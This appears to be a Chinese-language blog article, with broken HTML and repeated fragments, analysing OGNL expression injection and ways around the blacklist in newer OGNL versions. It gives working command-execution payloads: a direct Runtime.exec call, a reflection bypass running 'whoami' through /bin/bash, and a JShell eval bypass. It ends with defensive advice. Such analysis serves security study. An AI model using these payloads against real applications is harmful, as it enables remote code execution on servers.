OGNL表达式注入高版本绕过分析<\/h1>

OGNL基础<\/h2>
OGNL(Object-Graph Navigation Language)即对象图导航语言，是一种表达式语言，能够通过简短表达式访问、修改对象属性，调用方法甚至创建新对象。<\/p>

OGNL三要素<\/h3>

表达式(expression)<\/strong>：核心部分，定义要执行的操作<\/li>
根对象(root)<\/strong>：操作的目标对象<\/li>

上下文对象(context)<\/strong>：对象运行的上下文环境，以MAP结构描述对象属性及值<\/li> <\/ol>
OGNL语法<\/h3>

"."操作符<\/strong>：<\/p>

调用对象的属性和方法<\/li>
上一个节点的结果作为下一个节点的上下文<\/li>
示例：student.school.master.name<\/code><\/li> <\/ul> <\/li>
"#"操作符<\/strong>：<\/p> 调用非root对象<\/li> 创建Map：#{"name": "Mash1r0"}<\/code><\/li> 定义变量：#a=new java.lang.String[]{"calc"}<\/code><\/li> <\/ul> <\/li> "@"操作符<\/strong>：<\/p> 调用静态对象、静态方法、静态变量<\/li> 示例：@java.lang.Runtime@getRuntime().exec("calc")<\/code><\/li> <\/ul> <\/li> "$"操作符<\/strong>：<\/p> 引用OGNL上下文对象中的值<\/li> 常用于配置文件：<param name="name">${name}<\/param><\/code><\/li> <\/ul> <\/li> "%"操作符<\/strong>：<\/p> 计算OGNL表达式的值<\/li> 示例：%{hacker.name}<\/code>, %{1+1}<\/code><\/li> <\/ul> <\/li> List创建<\/strong>：<\/p> 直接使用{"green", "red", "blue"}<\/code>创建<\/li> <\/ul> <\/li> 对象创建<\/strong>：<\/p> 示例：new java.lang.String[]{"calc"}<\/code><\/li> <\/ul> <\/li> <\/ol> 投影与选择<\/h3> OGNL支持类似数据库的选择与投影功能：<\/p> 投影<\/strong>：<\/p> 语法：collection.{XXX}<\/code><\/li> 示例：students.{name}<\/code> - 提取所有学生的name属性<\/li> <\/ul> <\/li> 选择<\/strong>：<\/p> 语法：collection.{Y XXX}<\/code><\/li> 操作符： ?<\/code>：选择满足条件的所有元素<\/li> ^<\/code>：选择满足条件的第一个元素<\/li> $<\/code>：选择满足条件的最后一个元素<\/li> <\/ul> <\/li> 示例：students.{? #this.age > 18}<\/code> - 选择年龄大于18的学生<\/li> <\/ul> <\/li> <\/ol> OGNL高版本限制<\/h2> 在OGNL >=3.1.25、>=3.2.12版本中增加了黑名单机制，主要限制：<\/p> 精准匹配方法对象<\/strong>：.equals(method)<\/code><\/li> 类继承\/实现关系检查<\/strong>：.isAssignableFrom(methodDeclaringClass)<\/code><\/li> <\/ol> 黑名单分类<\/h3> 第一类限制<\/strong>：<\/p> setAccessible(boolean)<\/code> - 禁止开启私有访问<\/li> setAccessible([...])<\/code> - 禁止批量开启私有访问<\/li> System.exit(int)<\/code> - 禁止终止进程<\/li> System.console()<\/code> - 禁止获取console引用<\/li> <\/ul> <\/li> 第二类限制<\/strong>：<\/p> 检查调用的类是否为黑名单中的类或其子类\/实现类<\/li> 包括Runtime<\/code>等危险类<\/li> <\/ul> <\/li> <\/ol> 绕过技术<\/h2> 反射绕过<\/h3> 利用反射调用Runtime执行系统命令：<\/p> @java.lang.Class@forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>'<\/span>).<\/span>getDeclaredMethods<\/span>()[<\/span>1<\/span>].<\/span>invoke<\/span>(<\/span> <\/span><\/span> @java.lang.Class@forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>'<\/span>).<\/span>getDeclaredMethods<\/span>()[<\/span>0<\/span>].<\/span>invoke<\/span>(<\/span>null<\/span>),<\/span> <\/span><\/span> new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span>"-c"<\/span>,<\/span>"whoami"<\/span>}<\/span> <\/span><\/span>)<\/span> <\/span><\/span><\/code><\/pre>绕过流程：<\/p> 通过Class.forName<\/code>获取Runtime类<\/li> 使用getDeclaredMethods<\/code>获取方法<\/li> 通过反射调用getRuntime()<\/code>和exec()<\/code><\/li> <\/ol> JShell绕过(Java 9+)<\/h3> 利用Java 9引入的JShell功能执行代码：<\/p> @jdk.jshell.JShell@create<\/span>().<\/span>eval<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>)<\/span>'<\/span>)<\/span> <\/span><\/span><\/code><\/pre>特点：<\/p> 不需要编写完整类<\/li> 直接执行Java代码片段<\/li> 类似Python\/REPL交互式环境<\/li> <\/ul> 防御措施<\/h2> 升级OGNL版本<\/strong>：使用最新版本，确保安全机制生效<\/li> 输入验证<\/strong>：严格验证用户输入的OGNL表达式<\/li> 沙箱环境<\/strong>：在受限环境中执行OGNL表达式<\/li> 白名单机制<\/strong>：限制可调用的类和方法<\/li> <\/ol> 参考链接<\/h2> Java表达式注入之OGNL<\/a><\/li> OGNL参考文章<\/a><\/li> Struct2 OGNL表达式注入<\/a><\/li> JShell使用指南<\/a><\/li> <\/ol>

OGNL表达式注入高版本绕过分析<\/h1>

OGNL基础<\/h2> OGNL(Object-Graph Navigation Language)即对象图导航语言，是一种表达式语言，能够通过简短表达式访问、修改对象属性，调用方法甚至创建新对象。<\/p>

绕过技术<\/h2>

参考链接<\/h2> Java表达式注入之OGNL<\/a><\/li> OGNL参考文章<\/a><\/li> Struct2 OGNL表达式注入<\/a><\/li> JShell使用指南<\/a><\/li> <\/ol>

OGNL基础<\/h2>
OGNL(Object-Graph Navigation Language)即对象图导航语言，是一种表达式语言，能够通过简短表达式访问、修改对象属性，调用方法甚至创建新对象。<\/p>

参考链接<\/h2>

Java表达式注入之OGNL<\/a><\/li>
OGNL参考文章<\/a><\/li>
Struct2 OGNL表达式注入<\/a><\/li>
JShell使用指南<\/a><\/li> <\/ol>